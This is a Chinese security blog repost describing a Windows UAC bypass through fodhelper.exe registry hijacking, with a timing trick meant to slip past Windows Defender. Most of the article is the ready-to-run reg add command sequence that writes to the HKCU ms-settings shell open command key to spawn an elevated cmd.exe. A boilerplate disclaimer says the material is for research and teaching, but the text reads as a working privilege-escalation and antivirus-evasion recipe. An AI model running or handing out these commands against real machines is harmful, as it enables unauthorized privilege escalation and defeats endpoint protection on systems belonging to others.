【免杀实践】 绕过Windows Defender提权

admin
admin
admin
138640
文章
114
评论
2025年2月19日10:25:13评论14 views字数 1047阅读3分29秒阅读模式

开篇

【免杀实践】 绕过Windows Defender提权
【免杀实践】 绕过Windows Defender提权

实现原理

没有了解过基础原理的师傅可以自行上网查看相关内容,本文不过多讲解,直接上高速!
        按照正常的流程我们在bypass uac的时候:
#写入cmd.exe到指定路径下,执行fodhelper的时候会被劫持从而打开cmdreg add "HKCUSoftwareClassesms-settingsShellOpencommand" /t REG_SZ /d "cmd.exe" /f#必须键值reg add HKCUSoftwareClassesms-settingsShellOpencommand /v DelegateExecute /t REG_SZ /d "" /f#添加以上注册表之后,可直接运行,这时候就会弹出高权限cmd了fodhelper
这时候windows defender是会直接将注册表拦截的,在第一步写入cmd的时候就会报毒了。
绕过方法如下:
利用的点是windows defender检测的时候存在时间间隔,如果我们能将时间间隔利用起来。绕过最主要的点就是时间差!
#先将允许自动获取权限的exe写入其中,例如fodhelper。这时df并不会报毒reg add "HKCUSoftwareClassesms-settingsShellOpencommand" /t REG_SZ /d "fodhelper.exe" /f#必须键值reg add HKCUSoftwareClassesms-settingsShellOpencommand /v DelegateExecute /t REG_SZ /d "" /f#添加以上注册表之后,执行fodhelper#因为我们劫持的路径也是写着fodhelper#那么会导致死循环,fodhelper调用fodhelper调用fodhelper。。。。#这时候我们突然改变注册表的键值,将fodhelper改为cmd。#这时候死循环将会被跳出,fodhelper调用cmd,这时候就会弹出高权限cmd了reg add HKCUSoftwareClassesms-settingsShellOpencommand /t REG_SZ /d "cmd.exe" /f

测试效果

虽然windows defender报毒了,但是我们的cmd也是成功启动了,并且拥有了高权限!在测试过程中,你要确保你的机器可以利用该bypass uac方法提权。本文提到的内容仅用于绕过!!!

原文始发于微信公众号(零攻防):【免杀实践】 绕过Windows Defender提权

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月19日10:25:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【免杀实践】 绕过Windows Defender提权https://cn-sec.com/archives/3759216.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息